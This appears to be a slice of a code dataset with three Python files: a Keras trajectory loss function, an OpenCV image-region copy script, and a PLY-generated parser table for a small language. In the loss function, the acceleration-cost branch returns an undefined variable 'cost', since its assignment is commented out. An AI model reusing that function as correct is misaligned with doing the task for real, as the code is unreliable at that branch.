self.__name__ = "trajectory_sampler_loss"
def __call__(self, target, pred):
'''
Pred must be of size:
[batch_size=None, num_samples, traj_length, feature_size]
Targets must be of size:
[batch_size=None, traj_length, feature_size]
You can use the tools in "split" to generate this sort of data (for
targets). The actual loss function is just the L2 norm between each
point.
'''
# NOTE: cannot tile here, because target and pred have to be the same
# size. THAKS A LOT, KERAS.
# Tile each example point by the total number of samples
# target = K.tile(target, TensorShape([1,self.num_samples,1,1]))
# Compute L2 norm...
x = K.square(target - pred)
# sum along each output dimension for each point
x = K.sum(x,axis=-1,keepdims=False)
# square root and sum along each trajectory
x = K.sum(K.sqrt(x),axis=2,keepdims=False)
# mean across each sample
#x = K.min(x,axis=1,keepdims=False)
x = K.mean(x,axis=1,keepdims=False) #+ K.min(x,axis=1,keepdims=False)
if self.acc_cost is not None:
# Take the L2 norm of the acceleration output and add it to the
# loss.
# NOTE: we may end up computing this elsewhere to avoid extra
# penalties and stuff like that.
#cost = K.sum(K.square(acc))
return x + cost
else:
return x
| 33.255556 | 80 | 0.659205 | 2,167 | 0.724023 | 0 | 0 | 0 | 0 | 0 | 0 | 1,673 | 0.558971 |
e2bd10babdd8ebe01076d27ea6c764ee6769a395 | 351 | py | Python | CV0101EN-03-image_Region_of_img.py | reddyprasade/Computer-Vision-with-Python | 8eebec61f0fdacb05e122460d6845a32ae506c8f | [
"Apache-2.0"
] | null | null | null | CV0101EN-03-image_Region_of_img.py | reddyprasade/Computer-Vision-with-Python | 8eebec61f0fdacb05e122460d6845a32ae506c8f | [
"Apache-2.0"
] | null | null | null | CV0101EN-03-image_Region_of_img.py | reddyprasade/Computer-Vision-with-Python | 8eebec61f0fdacb05e122460d6845a32ae506c8f | [
"Apache-2.0"
] | null | null | null | # Image ROI(Region of Images)
import cv2 as cv
img = cv.imread('Photes/messi.jpg')
cv.imshow('Orginal Messi_Football',img)
ball = img[280:340, 330:390]
img[273:333, 100:160] = ball
cv.imshow('Change Messi_Football',img)
"""
import matplotlib.pyplot as plt
data = plt.imread('Photes/messi.jpg')
plt.imshow(data)
plt.show()
"""
| 17.55 | 40 | 0.669516 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 205 | 0.584046 |
e2bddb86848e5c95d116992f9ebaa02ffddfa4b9 | 26,717 | py | Python | dialect/parsetab.py | ACov96/dialect | c739a2bba6e30805b8db1f5743a1eb2faac5c578 | [
"MIT"
] | 1 | 2019-09-21T22:54:50.000Z | 2019-09-21T22:54:50.000Z | dialect/parsetab.py | ACov96/dialect | c739a2bba6e30805b8db1f5743a1eb2faac5c578 | [
"MIT"
] | 1 | 2019-09-22T22:21:00.000Z | 2019-09-22T22:36:32.000Z | dialect/parsetab.py | ACov96/dialect | c739a2bba6e30805b8db1f5743a1eb2faac5c578 | [
"MIT"
] | null | null | null |
# parsetab.py
# This file is automatically generated. Do not edit.
# pylint: disable=W,C,R
_tabversion = '3.10'
_lr_method = 'LALR'
_lr_signature = 'statement_listleftPLUSMINUSleftMULTIPLYDIVIDEAND ATOM BANG BOOL COLON COMMA DIVIDE ELIF ELSE END EQUAL EXIT FUN GT ID IF IMPORT LBRACE LBRACKET LPAREN LT MAC MINUS MULTIPLY NOT NULL NUMBER OR PLACEHOLDER PLUS RBRACE RBRACKET RETURN RPAREN SEMICOLON STRING WHILEstatement_list : statement statement_list\n | emptyempty :statement : IMPORT STRING SEMICOLONstatement : assignment SEMICOLONstatement : conditionalstatement : expr SEMICOLONstatement : macro_defstatement : macro_callassignment : l_value EQUAL r_valuestatement : looploop : WHILE LPAREN expr RPAREN LBRACE statement_list RBRACEstatement : fun_deffun_def : FUN ID LPAREN id_list RPAREN LBRACE statement_list RBRACEstatement : RETURN expr SEMICOLONid_list : IDid_list : ID COMMA id_listid_list : emptyconditional : IF LPAREN expr RPAREN LBRACE statement_list RBRACE conditional_elif conditional_elseconditional_elif : ELIF LPAREN expr RPAREN LBRACE statement_list RBRACE conditional_elifconditional_elif : emptyconditional_else : ELSE LBRACE statement_list RBRACEconditional_else : emptyr_value : exprl_value : IDl_value : ID fieldsl_value : PLACEHOLDERl_value : PLACEHOLDER fieldsfields : LBRACKET expr RBRACKETfields : LBRACKET expr RBRACKET fieldsexpr : alg_opexpr : STRINGexpr : NUMBERexpr : BOOLexpr : NULLexpr : func_callexpr : IDexpr : LPAREN expr RPARENexpr : anonymous_fun func_call : ID LPAREN arg_list RPARENarg_list : emptyarg_list : exprarg_list : expr COMMA arg_listalg_op : expr PLUS expr\n | expr MINUS expr\n | expr MULTIPLY expr\n | expr DIVIDE exprexpr : LBRACKET arg_list RBRACKETexpr : LBRACE record_list RBRACEexpr : LPAREN statement_list RPARENrecord_list : ID COLON exprrecord_list : ID COLON expr COMMA record_listrecord_list : emptyexpr : expr LBRACKET expr RBRACKETexpr : comp_opexpr : PLACEHOLDERcomp_op : expr EQUAL EQUAL exprcomp_op : expr BANG EQUAL exprcomp_op : expr GT exprcomp_op : expr GT EQUAL exprcomp_op : expr LT exprcomp_op : expr LT EQUAL exprexpr : log_oplog_op : expr AND 
exprlog_op : expr OR exprlog_op : NOT exprmacro_def : MAC macro_def_arg_list LBRACE statement_list RBRACEmacro_def_arg_list : ATOM macro_def_arg_list_recmacro_def_arg_list_rec : PLACEHOLDER macro_def_arg_list_recmacro_def_arg_list_rec : ATOM macro_def_arg_list_recmacro_def_arg_list_rec : emptymacro_call : ATOM macro_arg_list SEMICOLONmacro_arg_list : ATOM macro_arg_listmacro_arg_list : expr macro_arg_listmacro_arg_list : emptyanonymous_fun : LPAREN id_list RPAREN LBRACE statement_list RBRACE'
_lr_action_items = {'IMPORT':([0,2,7,9,10,11,12,16,36,37,78,92,106,112,123,137,141,142,148,149,150,152,154,155,156,158,160,164,165,167,168,],[4,4,-6,-8,-9,-11,-13,4,-5,-7,-4,-15,4,-72,4,4,-67,4,4,-3,-12,-3,-21,-14,-19,-23,4,-22,4,-3,-20,]),'RETURN':([0,2,7,9,10,11,12,16,36,37,78,92,106,112,123,137,141,142,148,149,150,152,154,155,156,158,160,164,165,167,168,],[13,13,-6,-8,-9,-11,-13,13,-5,-7,-4,-15,13,-72,13,13,-67,13,13,-3,-12,-3,-21,-14,-19,-23,13,-22,13,-3,-20,]),'$end':([0,1,2,3,7,9,10,11,12,34,36,37,78,92,112,141,149,150,152,154,155,156,158,164,167,168,],[-3,0,-3,-2,-6,-8,-9,-11,-13,-1,-5,-7,-4,-15,-72,-67,-3,-12,-3,-21,-14,-19,-23,-22,-3,-20,]),'IF':([0,2,7,9,10,11,12,16,36,37,78,92,106,112,123,137,141,142,148,149,150,152,154,155,156,158,160,164,165,167,168,],[15,15,-6,-8,-9,-11,-13,15,-5,-7,-4,-15,15,-72,15,15,-67,15,15,-3,-12,-3,-21,-14,-19,-23,15,-22,15,-3,-20,]),'STRING':([0,2,4,5,7,9,10,11,12,13,16,18,19,20,21,22,24,25,26,28,30,33,36,37,38,39,40,41,42,45,46,47,48,50,51,52,53,63,64,71,73,75,77,78,80,81,82,83,84,85,86,87,88,89,90,91,92,96,97,100,101,104,105,106,112,114,117,118,119,120,121,123,128,137,141,142,145,148,149,150,152,154,155,156,158,159,160,164,165,167,168,],[5,5,35,-32,-6,-8,-9,-11,-13,5,5,-31,-33,-34,-35,-36,-39,5,-55,-63,5,5,-5,-7,5,5,5,5,5,5,5,5,5,-37,-56,5,5,5,5,5,5,5,-66,-4,-44,-45,-46,-47,5,5,-59,5,-61,5,-64,-65,-15,-38,-50,-49,5,-48,5,5,-72,5,-54,-57,-58,-60,-62,5,-40,5,-67,5,-76,5,-3,-12,-3,-21,-14,-19,-23,5,5,-22,5,-3,-20,]),'NUMBER':([0,2,5,7,9,10,11,12,13,16,18,19,20,21,22,24,25,26,28,30,33,36,37,38,39,40,41,42,45,46,47,48,50,51,52,53,63,64,71,73,75,77,78,80,81,82,83,84,85,86,87,88,89,90,91,92,96,97,100,101,104,105,106,112,114,117,118,119,120,121,123,128,137,141,142,145,148,149,150,152,154,155,156,158,159,160,164,165,167,168,],[19,19,-32,-6,-8,-9,-11,-13,19,19,-31,-33,-34,-35,-36,-39,19,-55,-63,19,19,-5,-7,19,19,19,19,19,19,19,19,19,-37,-56,19,19,19,19,19,19,19,-66,-4,-44,-45,-46,-47,19,19,-59,19,-61,19,-64,-65,-15,-38,-50,-49,19,-48,1
9,19,-72,19,-54,-57,-58,-60,-62,19,-40,19,-67,19,-76,19,-3,-12,-3,-21,-14,-19,-23,19,19,-22,19,-3,-20,]),'BOOL':([0,2,5,7,9,10,11,12,13,16,18,19,20,21,22,24,25,26,28,30,33,36,37,38,39,40,41,42,45,46,47,48,50,51,52,53,63,64,71,73,75,77,78,80,81,82,83,84,85,86,87,88,89,90,91,92,96,97,100,101,104,105,106,112,114,117,118,119,120,121,123,128,137,141,142,145,148,149,150,152,154,155,156,158,159,160,164,165,167,168,],[20,20,-32,-6,-8,-9,-11,-13,20,20,-31,-33,-34,-35,-36,-39,20,-55,-63,20,20,-5,-7,20,20,20,20,20,20,20,20,20,-37,-56,20,20,20,20,20,20,20,-66,-4,-44,-45,-46,-47,20,20,-59,20,-61,20,-64,-65,-15,-38,-50,-49,20,-48,20,20,-72,20,-54,-57,-58,-60,-62,20,-40,20,-67,20,-76,20,-3,-12,-3,-21,-14,-19,-23,20,20,-22,20,-3,-20,]),'NULL':([0,2,5,7,9,10,11,12,13,16,18,19,20,21,22,24,25,26,28,30,33,36,37,38,39,40,41,42,45,46,47,48,50,51,52,53,63,64,71,73,75,77,78,80,81,82,83,84,85,86,87,88,89,90,91,92,96,97,100,101,104,105,106,112,114,117,118,119,120,121,123,128,137,141,142,145,148,149,150,152,154,155,156,158,159,160,164,165,167,168,],[21,21,-32,-6,-8,-9,-11,-13,21,21,-31,-33,-34,-35,-36,-39,21,-55,-63,21,21,-5,-7,21,21,21,21,21,21,21,21,21,-37,-56,21,21,21,21,21,21,21,-66,-4,-44,-45,-46,-47,21,21,-59,21,-61,21,-64,-65,-15,-38,-50,-49,21,-48,21,21,-72,21,-54,-57,-58,-60,-62,21,-40,21,-67,21,-76,21,-3,-12,-3,-21,-14,-19,-23,21,21,-22,21,-3,-20,]),'ID':([0,2,5,7,9,10,11,12,13,16,17,18,19,20,21,22,24,25,26,28,30,32,33,36,37,38,39,40,41,42,45,46,47,48,50,51,52,53,63,64,71,73,75,77,78,80,81,82,83,84,85,86,87,88,89,90,91,92,96,97,99,100,101,104,105,106,112,114,116,117,118,119,120,121,123,128,137,139,141,142,145,148,149,150,152,154,155,156,158,159,160,164,165,167,168,],[23,23,-32,-6,-8,-9,-11,-13,50,57,60,-31,-33,-34,-35,-36,-39,50,-55,-63,50,76,50,-5,-7,50,50,50,50,50,50,50,50,50,-37,-56,50,50,50,50,50,50,50,-66,-4,-44,-45,-46,-47,50,50,-59,50,-61,50,-64,-65,-15,-38,-50,124,-49,50,-48,50,23,-72,50,124,-54,-57,-58,-60,-62,23,-40,23,60,-67,23,-76,23,-3,-12,-3,-21,-14,-19,-23,50,23,-22,2
3,-3,-20,]),'LPAREN':([0,2,5,7,9,10,11,12,13,15,16,18,19,20,21,22,23,24,25,26,28,30,31,33,36,37,38,39,40,41,42,45,46,47,48,50,51,52,53,57,63,64,71,73,75,76,77,78,80,81,82,83,84,85,86,87,88,89,90,91,92,96,97,100,101,104,105,106,112,114,117,118,119,120,121,123,128,137,141,142,145,148,149,150,152,153,154,155,156,158,159,160,164,165,167,168,],[16,16,-32,-6,-8,-9,-11,-13,16,53,16,-31,-33,-34,-35,-36,63,-39,16,-55,-63,16,75,16,-5,-7,16,16,16,16,16,16,16,16,16,63,-56,16,16,63,16,16,16,16,16,116,-66,-4,-44,-45,-46,-47,16,16,-59,16,-61,16,-64,-65,-15,-38,-50,-49,16,-48,16,16,-72,16,-54,-57,-58,-60,-62,16,-40,16,-67,16,-76,16,-3,-12,-3,159,-21,-14,-19,-23,16,16,-22,16,-3,-20,]),'LBRACKET':([0,2,5,7,8,9,10,11,12,13,16,18,19,20,21,22,23,24,25,26,27,28,30,33,36,37,38,39,40,41,42,45,46,47,48,49,50,51,52,53,54,57,63,64,67,71,73,75,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,94,95,96,97,100,101,103,104,105,106,112,114,115,117,118,119,120,121,123,127,128,129,134,137,141,142,145,148,149,150,152,154,155,156,158,159,160,161,164,165,167,168,],[25,25,-32,-6,38,-8,-9,-11,-13,25,25,-31,-33,-34,-35,-36,64,-39,25,-55,64,-63,25,25,-5,-7,25,25,25,25,25,25,25,25,25,38,-37,-56,25,25,38,64,25,25,38,25,114,25,38,-4,38,-44,-45,-46,-47,25,25,38,25,38,25,38,38,-15,38,38,-38,-50,-49,25,38,-48,25,25,-72,25,38,-54,38,38,38,38,25,38,-40,64,38,25,-67,25,-76,25,-3,-12,-3,-21,-14,-19,-23,25,25,38,-22,25,-3,-20,]),'LBRACE':([0,2,5,7,9,10,11,12,13,16,18,19,20,21,22,24,25,26,28,30,33,36,37,38,39,40,41,42,45,46,47,48,50,51,52,53,63,64,69,70,71,73,75,77,78,80,81,82,83,84,85,86,87,88,89,90,91,92,96,97,98,100,101,104,105,106,107,108,109,110,112,114,117,118,119,120,121,122,123,128,132,133,135,137,141,142,143,145,148,149,150,152,154,155,156,157,158,159,160,163,164,165,167,168,],[17,17,-32,-6,-8,-9,-11,-13,17,17,-31,-33,-34,-35,-36,-39,17,-55,-63,17,17,-5,-7,17,17,17,17,17,17,17,17,17,-37,-56,17,17,17,17,106,-3,17,17,17,-66,-4,-44,-45,-46,-47,17,17,-59,17,-61,17,-64,-65,-15,-38,-50,123,-49,17,-48,17,17,-3,-68,-3,
-71,-72,17,-54,-57,-58,-60,-62,137,17,-40,-70,-69,142,17,-67,17,148,-76,17,-3,-12,-3,-21,-14,-19,160,-23,17,17,165,-22,17,-3,-20,]),'PLACEHOLDER':([0,2,5,7,9,10,11,12,13,16,18,19,20,21,22,24,25,26,28,30,33,36,37,38,39,40,41,42,45,46,47,48,50,51,52,53,63,64,70,71,73,75,77,78,80,81,82,83,84,85,86,87,88,89,90,91,92,96,97,100,101,104,105,106,107,109,112,114,117,118,119,120,121,123,128,137,141,142,145,148,149,150,152,154,155,156,158,159,160,164,165,167,168,],[27,27,-32,-6,-8,-9,-11,-13,51,27,-31,-33,-34,-35,-36,-39,51,-55,-63,51,51,-5,-7,51,51,51,51,51,51,51,51,51,-37,-56,51,51,51,51,109,51,51,51,-66,-4,-44,-45,-46,-47,51,51,-59,51,-61,51,-64,-65,-15,-38,-50,-49,51,-48,51,27,109,109,-72,51,-54,-57,-58,-60,-62,27,-40,27,-67,27,-76,27,-3,-12,-3,-21,-14,-19,-23,51,27,-22,27,-3,-20,]),'MAC':([0,2,7,9,10,11,12,16,36,37,78,92,106,112,123,137,141,142,148,149,150,152,154,155,156,158,160,164,165,167,168,],[29,29,-6,-8,-9,-11,-13,29,-5,-7,-4,-15,29,-72,29,29,-67,29,29,-3,-12,-3,-21,-14,-19,-23,29,-22,29,-3,-20,]),'ATOM':([0,2,5,7,9,10,11,12,16,18,19,20,21,22,24,26,28,29,30,36,37,50,51,70,71,73,77,78,80,81,82,83,86,88,90,91,92,96,97,100,104,106,107,109,112,117,118,119,120,121,123,128,137,141,142,145,148,149,150,152,154,155,156,158,160,164,165,167,168,],[30,30,-32,-6,-8,-9,-11,-13,30,-31,-33,-34,-35,-36,-39,-55,-63,70,71,-5,-7,-37,-56,107,71,71,-66,-4,-44,-45,-46,-47,-59,-61,-64,-65,-15,-38,-50,-49,-48,30,107,107,-72,-54,-57,-58,-60,-62,30,-40,30,-67,30,-76,30,-3,-12,-3,-21,-14,-19,-23,30,-22,30,-3,-20,]),'WHILE':([0,2,7,9,10,11,12,16,36,37,78,92,106,112,123,137,141,142,148,149,150,152,154,155,156,158,160,164,165,167,168,],[31,31,-6,-8,-9,-11,-13,31,-5,-7,-4,-15,31,-72,31,31,-67,31,31,-3,-12,-3,-21,-14,-19,-23,31,-22,31,-3,-20,]),'FUN':([0,2,7,9,10,11,12,16,36,37,78,92,106,112,123,137,141,142,148,149,150,152,154,155,156,158,160,164,165,167,168,],[32,32,-6,-8,-9,-11,-13,32,-5,-7,-4,-15,32,-72,32,32,-67,32,32,-3,-12,-3,-21,-14,-19,-23,32,-22,32,-3,-20,]),'NOT':([0,2,5,7,9,10,11,12,13,
16,18,19,20,21,22,24,25,26,28,30,33,36,37,38,39,40,41,42,45,46,47,48,50,51,52,53,63,64,71,73,75,77,78,80,81,82,83,84,85,86,87,88,89,90,91,92,96,97,100,101,104,105,106,112,114,117,118,119,120,121,123,128,137,141,142,145,148,149,150,152,154,155,156,158,159,160,164,165,167,168,],[33,33,-32,-6,-8,-9,-11,-13,33,33,-31,-33,-34,-35,-36,-39,33,-55,-63,33,33,-5,-7,33,33,33,33,33,33,33,33,33,-37,-56,33,33,33,33,33,33,33,-66,-4,-44,-45,-46,-47,33,33,-59,33,-61,33,-64,-65,-15,-38,-50,-49,33,-48,33,33,-72,33,-54,-57,-58,-60,-62,33,-40,33,-67,33,-76,33,-3,-12,-3,-21,-14,-19,-23,33,33,-22,33,-3,-20,]),'RPAREN':([2,3,5,7,9,10,11,12,16,18,19,20,21,22,24,26,27,28,34,36,37,50,51,54,55,56,57,58,63,66,67,77,78,80,81,82,83,86,88,90,91,92,95,96,97,99,100,102,104,105,112,115,116,117,118,119,120,121,124,125,126,128,130,136,141,145,149,150,152,154,155,156,158,161,164,167,168,],[-3,-2,-32,-6,-8,-9,-11,-13,-3,-31,-33,-34,-35,-36,-39,-55,-56,-63,-1,-5,-7,-37,-56,96,97,98,-16,-2,-3,-41,-42,-66,-4,-44,-45,-46,-47,-59,-61,-64,-65,-15,122,-38,-50,-3,-49,128,-48,-3,-72,135,-3,-54,-57,-58,-60,-62,-16,-17,-18,-40,-43,143,-67,-76,-3,-12,-3,-21,-14,-19,-23,163,-22,-3,-20,]),'RBRACE':([2,3,5,7,9,10,11,12,17,18,19,20,21,22,24,26,28,34,36,37,50,51,59,61,77,78,80,81,82,83,86,88,90,91,92,96,97,100,104,106,112,117,118,119,120,121,123,127,128,131,137,138,139,141,142,144,145,146,147,148,149,150,151,152,154,155,156,158,160,162,164,165,166,167,168,],[-3,-2,-32,-6,-8,-9,-11,-13,-3,-31,-33,-34,-35,-36,-39,-55,-63,-1,-5,-7,-37,-56,100,-53,-66,-4,-44,-45,-46,-47,-59,-61,-64,-65,-15,-38,-50,-49,-48,-3,-72,-54,-57,-58,-60,-62,-3,-51,-40,141,-3,145,-3,-67,-3,149,-76,-52,150,-3,-3,-12,155,-3,-21,-14,-19,-23,-3,164,-22,-3,167,-3,-20,]),'SEMICOLON':([5,6,8,18,19,20,21,22,23,24,26,27,28,30,35,49,50,51,54,57,71,72,73,74,77,80,81,82,83,86,88,90,91,93,94,96,97,100,104,111,113,117,118,119,120,121,128,145,],[-32,36,37,-31,-33,-34,-35,-36,-37,-39,-55,-56,-63,-3,78,92,-37,-56,37,-37,-3,112,-3,-75,-66,-44,-45,-46,-47,-59,-61,-64,-6
5,-10,-24,-38,-50,-49,-48,-73,-74,-54,-57,-58,-60,-62,-40,-76,]),'PLUS':([5,8,18,19,20,21,22,23,24,26,27,28,49,50,51,54,57,67,73,77,79,80,81,82,83,86,88,90,91,94,95,96,97,100,103,104,115,117,118,119,120,121,127,128,134,145,161,],[-32,39,-31,-33,-34,-35,-36,-37,-39,-55,-56,-63,39,-37,-56,39,-37,39,39,39,39,-44,-45,-46,-47,39,39,39,39,39,39,-38,-50,-49,39,-48,39,-54,39,39,39,39,39,-40,39,-76,39,]),'MINUS':([5,8,18,19,20,21,22,23,24,26,27,28,49,50,51,54,57,67,73,77,79,80,81,82,83,86,88,90,91,94,95,96,97,100,103,104,115,117,118,119,120,121,127,128,134,145,161,],[-32,40,-31,-33,-34,-35,-36,-37,-39,-55,-56,-63,40,-37,-56,40,-37,40,40,40,40,-44,-45,-46,-47,40,40,40,40,40,40,-38,-50,-49,40,-48,40,-54,40,40,40,40,40,-40,40,-76,40,]),'MULTIPLY':([5,8,18,19,20,21,22,23,24,26,27,28,49,50,51,54,57,67,73,77,79,80,81,82,83,86,88,90,91,94,95,96,97,100,103,104,115,117,118,119,120,121,127,128,134,145,161,],[-32,41,-31,-33,-34,-35,-36,-37,-39,-55,-56,-63,41,-37,-56,41,-37,41,41,41,41,41,41,-46,-47,41,41,41,41,41,41,-38,-50,-49,41,-48,41,-54,41,41,41,41,41,-40,41,-76,41,]),'DIVIDE':([5,8,18,19,20,21,22,23,24,26,27,28,49,50,51,54,57,67,73,77,79,80,81,82,83,86,88,90,91,94,95,96,97,100,103,104,115,117,118,119,120,121,127,128,134,145,161,],[-32,42,-31,-33,-34,-35,-36,-37,-39,-55,-56,-63,42,-37,-56,42,-37,42,42,42,42,42,42,-46,-47,42,42,42,42,42,42,-38,-50,-49,42,-48,42,-54,42,42,42,42,42,-40,42,-76,42,]),'EQUAL':([5,8,14,18,19,20,21,22,23,24,26,27,28,43,44,45,46,49,50,51,54,57,62,67,68,73,77,79,80,81,82,83,86,88,90,91,94,95,96,97,100,103,104,115,117,118,119,120,121,127,128,129,134,140,145,161,],[-32,43,52,-31,-33,-34,-35,-36,-25,-39,-55,-27,-63,84,85,87,89,43,-37,-56,43,-25,-26,43,-28,43,43,43,-44,-45,-46,-47,43,43,43,43,43,43,-38,-50,-49,43,-48,43,-54,43,43,43,43,43,-40,-29,43,-30,-76,43,]),'BANG':([5,8,18,19,20,21,22,23,24,26,27,28,49,50,51,54,57,67,73,77,79,80,81,82,83,86,88,90,91,94,95,96,97,100,103,104,115,117,118,119,120,121,127,128,134,145,161,],[-32,44,-31,-33,-34,-35,-36,-37,-39,-
55,-56,-63,44,-37,-56,44,-37,44,44,44,44,-44,-45,-46,-47,44,44,44,44,44,44,-38,-50,-49,44,-48,44,-54,44,44,44,44,44,-40,44,-76,44,]),'GT':([5,8,18,19,20,21,22,23,24,26,27,28,49,50,51,54,57,67,73,77,79,80,81,82,83,86,88,90,91,94,95,96,97,100,103,104,115,117,118,119,120,121,127,128,134,145,161,],[-32,45,-31,-33,-34,-35,-36,-37,-39,-55,-56,-63,45,-37,-56,45,-37,45,45,45,45,-44,-45,-46,-47,45,45,45,45,45,45,-38,-50,-49,45,-48,45,-54,45,45,45,45,45,-40,45,-76,45,]),'LT':([5,8,18,19,20,21,22,23,24,26,27,28,49,50,51,54,57,67,73,77,79,80,81,82,83,86,88,90,91,94,95,96,97,100,103,104,115,117,118,119,120,121,127,128,134,145,161,],[-32,46,-31,-33,-34,-35,-36,-37,-39,-55,-56,-63,46,-37,-56,46,-37,46,46,46,46,-44,-45,-46,-47,46,46,46,46,46,46,-38,-50,-49,46,-48,46,-54,46,46,46,46,46,-40,46,-76,46,]),'AND':([5,8,18,19,20,21,22,23,24,26,27,28,49,50,51,54,57,67,73,77,79,80,81,82,83,86,88,90,91,94,95,96,97,100,103,104,115,117,118,119,120,121,127,128,134,145,161,],[-32,47,-31,-33,-34,-35,-36,-37,-39,-55,-56,-63,47,-37,-56,47,-37,47,47,47,47,-44,-45,-46,-47,47,47,47,47,47,47,-38,-50,-49,47,-48,47,-54,47,47,47,47,47,-40,47,-76,47,]),'OR':([5,8,18,19,20,21,22,23,24,26,27,28,49,50,51,54,57,67,73,77,79,80,81,82,83,86,88,90,91,94,95,96,97,100,103,104,115,117,118,119,120,121,127,128,134,145,161,],[-32,48,-31,-33,-34,-35,-36,-37,-39,-55,-56,-63,48,-37,-56,48,-37,48,48,48,48,-44,-45,-46,-47,48,48,48,48,48,48,-38,-50,-49,48,-48,48,-54,48,48,48,48,48,-40,48,-76,48,]),'COMMA':([5,18,19,20,21,22,24,26,28,50,51,57,67,77,80,81,82,83,86,88,90,91,96,97,100,104,117,118,119,120,121,124,127,128,134,145,],[-32,-31,-33,-34,-35,-36,-39,-55,-63,-37,-56,99,105,-66,-44,-45,-46,-47,-59,-61,-64,-65,-38,-50,-49,-48,-54,-57,-58,-60,-62,99,139,-40,105,-76,]),'RBRACKET':([5,18,19,20,21,22,24,25,26,28,50,51,65,66,67,77,79,80,81,82,83,86,88,90,91,96,97,100,103,104,105,114,117,118,119,120,121,128,130,134,145,],[-32,-31,-33,-34,-35,-36,-39,-3,-55,-63,-37,-56,104,-41,-42,-66,117,-44,-45,-46,-47,-59,-61,-64,-65,-38,-50,-4
9,129,-48,-3,-3,-54,-57,-58,-60,-62,-40,-43,117,-76,]),'COLON':([60,],[101,]),'ELIF':([149,167,],[153,153,]),'ELSE':([149,152,154,167,168,],[-3,157,-21,-3,-20,]),}
# Machine-generated by PLY ("Do not edit", see header); this loop only
# decompresses the table. _lr_action_items maps each terminal token to a
# pair (state list, action list); invert it so that
# _lr_action[state][token] -> parser action (shift/reduce/accept code).
_lr_action = {}
for _k, _v in _lr_action_items.items():
   for _x,_y in zip(_v[0],_v[1]):
      if not _x in _lr_action: _lr_action[_x] = {}
      _lr_action[_x][_k] = _y
# Drop the compressed form once expanded.
del _lr_action_items
_lr_goto_items = {'statement_list':([0,2,16,106,123,137,142,148,160,165,],[1,34,55,131,138,144,147,151,162,166,]),'statement':([0,2,16,106,123,137,142,148,160,165,],[2,2,2,2,2,2,2,2,2,2,]),'empty':([0,2,16,17,25,30,63,70,71,73,99,105,106,107,109,114,116,123,137,139,142,148,149,152,160,165,167,],[3,3,58,61,66,74,66,110,74,74,126,66,3,110,110,66,126,3,3,61,3,3,154,158,3,3,154,]),'assignment':([0,2,16,106,123,137,142,148,160,165,],[6,6,6,6,6,6,6,6,6,6,]),'conditional':([0,2,16,106,123,137,142,148,160,165,],[7,7,7,7,7,7,7,7,7,7,]),'expr':([0,2,13,16,25,30,33,38,39,40,41,42,45,46,47,48,52,53,63,64,71,73,75,84,85,87,89,101,105,106,114,123,137,142,148,159,160,165,],[8,8,49,54,67,73,77,79,80,81,82,83,86,88,90,91,94,95,67,103,73,73,115,118,119,120,121,127,67,8,134,8,8,8,8,161,8,8,]),'macro_def':([0,2,16,106,123,137,142,148,160,165,],[9,9,9,9,9,9,9,9,9,9,]),'macro_call':([0,2,16,106,123,137,142,148,160,165,],[10,10,10,10,10,10,10,10,10,10,]),'loop':([0,2,16,106,123,137,142,148,160,165,],[11,11,11,11,11,11,11,11,11,11,]),'fun_def':([0,2,16,106,123,137,142,148,160,165,],[12,12,12,12,12,12,12,12,12,12,]),'l_value':([0,2,16,106,123,137,142,148,160,165,],[14,14,14,14,14,14,14,14,14,14,]),'alg_op':([0,2,13,16,25,30,33,38,39,40,41,42,45,46,47,48,52,53,63,64,71,73,75,84,85,87,89,101,105,106,114,123,137,142,148,159,160,165,],[18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,]),'func_call':([0,2,13,16,25,30,33,38,39,40,41,42,45,46,47,48,52,53,63,64,71,73,75,84,85,87,89,101,105,106,114,123,137,142,148,159,160,165,],[22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,]),'anonymous_fun':([0,2,13,16,25,30,33,38,39,40,41,42,45,46,47,48,52,53,63,64,71,73,75,84,85,87,89,101,105,106,114,123,137,142,148,159,160,165,],[24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,]),'comp_op':([0,2,13,16,25,30,33,38,39
,40,41,42,45,46,47,48,52,53,63,64,71,73,75,84,85,87,89,101,105,106,114,123,137,142,148,159,160,165,],[26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,]),'log_op':([0,2,13,16,25,30,33,38,39,40,41,42,45,46,47,48,52,53,63,64,71,73,75,84,85,87,89,101,105,106,114,123,137,142,148,159,160,165,],[28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,]),'id_list':([16,99,116,],[56,125,136,]),'record_list':([17,139,],[59,146,]),'fields':([23,27,57,129,],[62,68,62,140,]),'arg_list':([25,63,105,114,],[65,102,130,65,]),'macro_def_arg_list':([29,],[69,]),'macro_arg_list':([30,71,73,],[72,111,113,]),'r_value':([52,],[93,]),'macro_def_arg_list_rec':([70,107,109,],[108,132,133,]),'conditional_elif':([149,167,],[152,168,]),'conditional_else':([152,],[156,]),}
# Same decompression for the goto table:
# _lr_goto[state][nonterminal] -> next parser state.
_lr_goto = {}
for _k, _v in _lr_goto_items.items():
   for _x, _y in zip(_v[0], _v[1]):
       if not _x in _lr_goto: _lr_goto[_x] = {}
       _lr_goto[_x][_k] = _y
# Drop the compressed form once expanded.
del _lr_goto_items
_lr_productions = [
("S' -> statement_list","S'",1,None,None,None),
('statement_list -> statement statement_list','statement_list',2,'p_statement_list','parse.py',20),
('statement_list -> empty','statement_list',1,'p_statement_list','parse.py',21),
('empty -> <empty>','empty',0,'p_empty','parse.py',30),
('statement -> IMPORT STRING SEMICOLON','statement',3,'p_statement_import','parse.py',34),
('statement -> assignment SEMICOLON','statement',2,'p_statement_assignment','parse.py',38),
('statement -> conditional','statement',1,'p_statement_conditional','parse.py',42),
('statement -> expr SEMICOLON','statement',2,'p_statement_expr','parse.py',46),
('statement -> macro_def','statement',1,'p_statement_macro_def','parse.py',50),
('statement -> macro_call','statement',1,'p_statement_macro_call','parse.py',54),
('assignment -> l_value EQUAL r_value','assignment',3,'p_assignment','parse.py',58),
('statement -> loop','statement',1,'p_statement_loop','parse.py',62),
